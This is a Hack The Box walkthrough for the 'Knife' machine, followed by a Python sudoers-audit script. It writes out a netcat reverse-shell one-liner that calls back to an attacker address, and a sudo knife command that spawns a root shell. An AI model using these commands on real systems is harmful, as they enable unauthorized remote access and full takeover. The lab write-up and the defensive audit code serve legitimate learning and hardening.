KNIFE HTB WALKTHROUGH
Hello everyone, in this story I will be sharing my writeup for Knife, an active and easy Linux machine on Hack The Box.
NMAP
Now, I start an Nmap scan.
PORT 80 (HTTP)
Using the Wappalyzer browser extension, we can see that PHP 8.1.0 is used on the web server. After that, we check whether there is any exploitation method for this PHP version.
I found an exploitation method for PHP version 8.1.0 at Exploit Database and downloaded it (https://www.exploit-db.com/exploits/49933).
We have accessed the system with the privileges of the James user. My next step is to spawn a reverse shell with Netcat, so I start listening on port 9876.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip address> 9876 >/tmp/f
Now we get the user flag. After that, we need privilege escalation to get the other flag.
Enter this command to get a root shell.
sudo knife exec --exec "exec '/bin/sh -i'"
Now I can get the root flag.
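The root shell above works because a low-privileged user may run knife, which executes arbitrary Ruby, through sudo. As an added example (not part of the original writeup), here is a first-pass sudoers audit that flags grants of this kind; the binary list and the sample sudoers text are constructed assumptions, and aliases are not expanded.

```python
import os
import re

# Illustrative subset of programs that can run arbitrary code when launched
# through sudo (assumption: extend this list for your own environment).
CODE_EXEC = {"knife", "ruby", "python3", "perl", "vim", "find", "awk", "env", "bash", "sh"}
SKIP = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
RULE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\(([^)]*)\)\s*)?(.+)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, SETENV:, ...


def audit_sudoers(text):
    """Return (user, runas, command, nopasswd) for each risky grant.

    Aliases are not expanded; this is a first-pass review aid, not a parser
    for the full sudoers grammar.
    """
    findings = []
    for line in text.replace("\\\n", " ").splitlines():  # join continuations
        line = line.split("#", 1)[0].strip()              # drop comments
        match = RULE.match(line)
        if not match or line.startswith(SKIP):
            continue
        user, runas, specs = match.group(1), match.group(2) or "root", match.group(3)
        nopasswd = False
        for spec in specs.split(","):
            spec = spec.strip()
            tags = TAGS.match(spec)
            if tags:  # a tag stays in effect for later commands in the rule
                names = re.findall(r"[A-Z_]+", tags.group(0))
                nopasswd = "NOPASSWD" in names or (nopasswd and "PASSWD" not in names)
                spec = spec[tags.end():]
            if not spec or spec.startswith("!"):
                continue  # empty or negated entry
            command = spec.split()[0]
            if command == "ALL" or os.path.basename(command) in CODE_EXEC:
                findings.append((user, runas.strip(), command, nopasswd))
    return findings


# Constructed sudoers content, not taken from the Knife machine.
SAMPLE = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/knife
deploy  ALL=(root) /usr/bin/systemctl restart nginx, NOPASSWD: /usr/bin/find
"""

if __name__ == "__main__":
    for user, runas, command, nopasswd in audit_sudoers(SAMPLE):
        print(f"{user}: {command} as {runas}" + (" (no password)" if nopasswd else ""))
```

Any finding for a non-administrative account is worth reviewing: either remove the grant or replace it with a wrapper that exposes only the specific operation the user needs.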